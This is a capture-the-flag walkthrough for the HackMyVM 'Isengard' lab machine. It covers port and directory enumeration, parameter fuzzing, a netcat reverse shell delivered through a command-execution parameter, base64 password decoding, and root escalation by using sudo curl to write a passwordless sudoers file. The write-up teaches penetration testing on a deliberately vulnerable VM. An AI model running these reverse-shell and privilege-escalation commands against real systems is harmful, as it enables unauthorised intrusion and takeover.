Isengard Writeup – HackMyVM – Walkthrough
Isengard is an easy machine from HackMyVM by bit. It works well on VirtualBox. We get a foothold on the machine through remote command execution, and for the root part we abuse sudo permissions.
Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Isengard
Identify the target
Firstly, I got the IP address of the target by scanning the live hosts.
sudo netdiscover -r 10.0.0.0/24

Scan open ports
Next, I scanned open ports on the target that are exposed to the network. This allows us to interact with the machine and gives a lot of insights into it.
nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.102

Here, only port 80 is open; there is no SSH port. Hence, to get a shell we must either execute remote commands on this machine or somehow open the SSH port. In this machine, the web application has a remote command execution vulnerability.
Enumerate the webserver
The homepage links a CSS file that contains a path worth looking at.

There are a lot of rabbit holes throughout the website, which I will skip. Next, I brute-forced further paths inside the newly identified directory.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.102/y0ush4lln0tp4ss/ -x php,html,txt -o dir-youshallnotpass-medium.txt

Likewise, I did the same for the /east path.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.0.0.102/y0ush4lln0tp4ss/east -x php,html,txt -o dir-east-big.txt

Finally, I found a script, mellon.php, that might be vulnerable to either LFI or RCE. Thus, I fuzzed for its parameters.
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 'http://10.0.0.102/y0ush4lln0tp4ss/east/mellon.php?FUZZ=id' -fs 0

With the parameter identified, I could spawn a reverse shell. First, I listened on port 9001.
nc -nlvp 9001
I checked the manual page of “netcat” on the target and found that it is the traditional version, which supports the “-e” flag.

Since that was the easiest way, I spawned the reverse shell with it.
?frodo=nc -e /bin/bash 10.0.0.4 9001

Next, I upgraded the shell.
Upgrade to an intelligent reverse shell
Switch to the user
In the “east” directory, there is a readme file.
ls -al

The readme gives us another hint.

The hint tells us to find the ring file. There is already a “ring.zip” in this directory, but it is not the one we are looking for, so I searched the filesystem for it.
find / -name "ring.zip" -exec ls -al {} \; 2>/dev/null

Then, I extracted the zip into a new directory under /tmp.
mkdir /tmp/ring
unzip /opt/.nothingtoseehere/.donotcontinue/.stop/.heWillKnowYouHaveIt/.willNotStop/.ok_butDestroyIt/ring.zip -d /tmp/ring/

The zip file contains a base64-encoded text file, which is encoded multiple times.
base64 -d /tmp/ring/ring.txt | base64 -d

The decoded text is the password for the user sauron on the target.
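The multi-round decode above, as an added Python example that is not part of the original writeup: it peels base64 layers until the content stops decoding to printable text, so the number of layers does not have to be guessed, and it caps the rounds so a crafted file cannot keep it looping. The sample value is constructed, and the helper assumes the final payload is text, as ring.txt was; a binary payload would stop one layer early.

```python
import base64
import binascii
import re

# Standard base64 alphabet, optional '=' padding, plus the newlines that the
# base64(1) CLI emits.
_B64_RE = re.compile(rb"^[A-Za-z0-9+/\s]*={0,2}\s*$")

def _looks_like_base64(data: bytes) -> bool:
    """True if every character is legal base64 and the length fits 4-char groups."""
    stripped = b"".join(data.split())
    return bool(stripped) and len(stripped) % 4 == 0 and _B64_RE.match(data) is not None

def _is_text(data: bytes) -> bool:
    """True if the bytes are UTF-8 and contain only printable characters."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)

def wrap_base64(data: bytes, layers: int) -> bytes:
    """Encode `data` with base64 `layers` times, newline-terminated like the CLI."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data + b"\n"

def decode_nested_base64(data: bytes, max_layers: int = 16):
    """Peel base64 layers until the content stops decoding to printable text.

    Returns (plaintext, layers_removed). A layer is accepted only when it
    decodes strictly and the result is still text, so a short password that
    merely looks like base64 is not turned into garbage; max_layers bounds
    the loop against crafted input that keeps decoding forever.
    """
    current, layers = data, 0
    while layers < max_layers and _looks_like_base64(current):
        try:
            decoded = base64.b64decode(b"".join(current.split()), validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded or not _is_text(decoded):
            break
        current, layers = decoded, layers + 1
    return current, layers

# Constructed sample: a fake password wrapped twice, like ring.txt needing two `base64 -d` runs.
SAMPLE = wrap_base64(b"s0m3-p4ssw0rd", 2)
print(decode_nested_base64(SAMPLE))  # → (b's0m3-p4ssw0rd', 2)
```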

Root privilege escalation
For the root part, the user can execute the “curl” binary with sudo as any user.

There are several ways to get a root shell. One easy way is to overwrite the /etc/passwd file. Likewise, since we can write files as root through sudo, we can add a sudoers rule that lets the user execute all binaries. I will use the sudoers method for this writeup.
First, I created a sudoers file in the /tmp directory.
echo 'sauron ALL=(ALL) NOPASSWD: ALL' > /tmp/sauron
sudo curl file:///tmp/sauron -o /etc/sudoers.d/sauron
sudo -l

Finally, I could switch to root.
sudo -i
